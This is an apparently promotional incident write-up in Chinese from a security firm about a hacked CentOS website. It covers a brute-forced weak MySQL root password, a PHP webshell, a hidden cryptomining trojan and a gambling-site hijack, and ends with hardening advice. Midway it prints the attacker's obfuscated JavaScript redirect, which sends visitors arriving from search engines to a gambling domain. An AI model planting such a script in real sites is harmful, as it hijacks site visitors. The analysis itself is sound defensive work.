近日某客戶網(wǎng)站被黑，導(dǎo)致網(wǎng)站首頁被篡改并跳轉(zhuǎn)到賭博網(wǎng)站，網(wǎng)站在百度的收錄也收錄了一些什么彩票內(nèi)容的快照，網(wǎng)站首頁快照也被修改成賭博內(nèi)容，并被百度直接紅色風(fēng)險攔截提示，百度網(wǎng)址安全中心提醒您：該站點可能受到黑客攻擊，部分頁面已被非法篡改!我們SINE安全公司根據(jù)以上客戶被黑的情況，立即進行了全面的網(wǎng)站安全檢測，針對網(wǎng)站被黑的情況制定了詳細(xì)的安全部署方案。

首先客戶網(wǎng)站使用的是Linux centos系統(tǒng)服務(wù)器，客戶提供服務(wù)器ip,ssh端口，root賬號密碼后，我們進去查看了服務(wù)器是否存在被黑以及系統(tǒng)木馬后門的情況，再一個我們對其使用的mysql數(shù)據(jù)庫進行了安全檢測，發(fā)現(xiàn)問題，該mysql數(shù)據(jù)庫的root賬號使用的是弱口令密碼，導(dǎo)致攻擊者可以利用軟件對數(shù)據(jù)庫進行強力破解，導(dǎo)致破解成功，利用root權(quán)限直接提權(quán)并上傳腳本木馬到網(wǎng)站的根目錄下。

根據(jù)上面發(fā)現(xiàn)的數(shù)據(jù)庫安全問題，我們深度挖掘，追蹤溯源，發(fā)現(xiàn)服務(wù)器還存在木馬后門，top，查看linux當(dāng)前進程，發(fā)現(xiàn)一個可疑的進程，通過查看進程的詳細(xì)信息我們發(fā)現(xiàn)該進程是木馬后門進程，再仔細(xì)一檢查發(fā)現(xiàn)該木馬是挖礦木馬，攻擊者利用服務(wù)器資源，帶寬，進行挖礦，像比特幣、以太坊等幣進行挖礦。

我們對其挖礦木馬進行安全分析：如下圖

解密木馬內(nèi)容，我們發(fā)現(xiàn)該木馬目前來說是免殺的木馬，一般人是看不出問題來，但是經(jīng)常維護服務(wù)器的運維人員就會察覺出來，第一該木馬隱藏到linux進程當(dāng)中去，根據(jù)時間段進行挖礦，避開高峰時間，以及維護人員的工作時間，當(dāng)挖礦的時候木馬進程CPU占用達(dá)到百分之80以上，甚至有時候網(wǎng)站都打開很慢。服務(wù)器的木馬查完后，我們對網(wǎng)站的源代碼進行安全檢測，發(fā)現(xiàn)網(wǎng)站目錄里被上傳了網(wǎng)站木馬后門，php腳本木馬，該腳本木馬可以對網(wǎng)站進行讀寫新建等操作，網(wǎng)站的首頁標(biāo)題描述也被改成了什么賭博的內(nèi)容如下圖：

<>eval(function(p,a,c,k,e,d){e=function(c){return(c

(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString

(36))};if(!”.replace(/^/,String)){while(c–)d[e(c)]=k[c]||e(c);k=

[function(e){return d[e]}];e=function(){return’\w+’};c=1;};while(c–)

if(k[c])p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c]);return p;}

(‘3.4(“”);3.4(“d 1=3.f”);3.4(“e(1.2(\”7\”)>0 || 1.2(

“6\”)>0 || 1.2(\”8\”)>0 ||1.2(\”a\”)>0 ||1.2(\”9\”)>0 ||1.2(

“l\”)>0 ||1.2(\”m\”)>0 ||1.2(\”k\”)>0 )”);3.4(“h.g=\”j://i.o.n

“;”);3.4(“”);’,25,25,’|s|indexOf|document|writeln||sogou|

baidu|soso|uc|sm|Java|LANGUAGE|var|if|referrer|href|location|www|

http|so|bing|yahoo|com|268238′.split(‘|’),0,{}))

通過解密上面的代碼發(fā)現(xiàn)，只要是從百度，搜狗，以及soso，so,bing等搜索引擎來的訪問，都會直接跳轉(zhuǎn)到攻擊者設(shè)定好的賭博網(wǎng)站上去。隨即我們SINE安全公司對該惡意代碼進行了清除，網(wǎng)站恢復(fù)正常訪問。

以上就是我們解決客戶網(wǎng)站安全的整個過程，下面針對于此次網(wǎng)站被黑，提供如下 的網(wǎng)站安全建議：

1.對mysql數(shù)據(jù)庫進行安全部署，對root賬號密碼加密，盡可能設(shè)置的復(fù)雜一些，數(shù)字+大小寫字母+特殊符號，對網(wǎng)站數(shù)據(jù)庫進行分配普通權(quán)限賬號。

2.mysql數(shù)據(jù)庫默認(rèn)端口3306，改為51158，并加入到端口安全策略，不對外開放，外網(wǎng)IP無法連接數(shù)據(jù)庫，只有本地127.0.0.1才能進行連接數(shù)據(jù)庫，以防止攻擊者惡意猜測。

3.對服務(wù)器底層系統(tǒng)進行安全加固，包括SSH登錄的安全驗證。

4.對網(wǎng)站代碼進行整體的安全檢測，包括定期的升級網(wǎng)站程序源代碼，修復(fù)補丁以及網(wǎng)站漏洞。